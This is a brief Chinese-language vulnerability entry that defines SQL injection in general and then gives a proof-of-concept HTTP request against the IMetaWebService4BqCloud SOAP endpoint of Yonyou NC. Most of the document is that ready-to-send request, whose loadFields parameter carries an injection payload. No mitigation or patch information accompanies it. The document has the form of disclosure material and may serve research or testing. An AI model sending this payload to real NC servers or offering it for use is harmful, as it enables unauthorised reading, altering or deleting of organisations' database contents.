漏洞描述
SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,从而绕过应用程序的安全措施,直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下,使得攻击者能够获取、修改或删除数据库中的数据,甚至可能执行服务器上的任意代码。
用友NC IMetaWebService4BqCloud SQL注入漏洞
PoC代码
POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 310
Content-Type: text/xml
Soapaction: urn:loadFields
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud"><soapenv:Header/><soapenv:Body><imet:loadFields><!--Optional:--><imet:string>SmartModel^2'+or+1%3d%3d1+--</imet:string></imet:loadFields></soapenv:Body></soapenv:Envelope>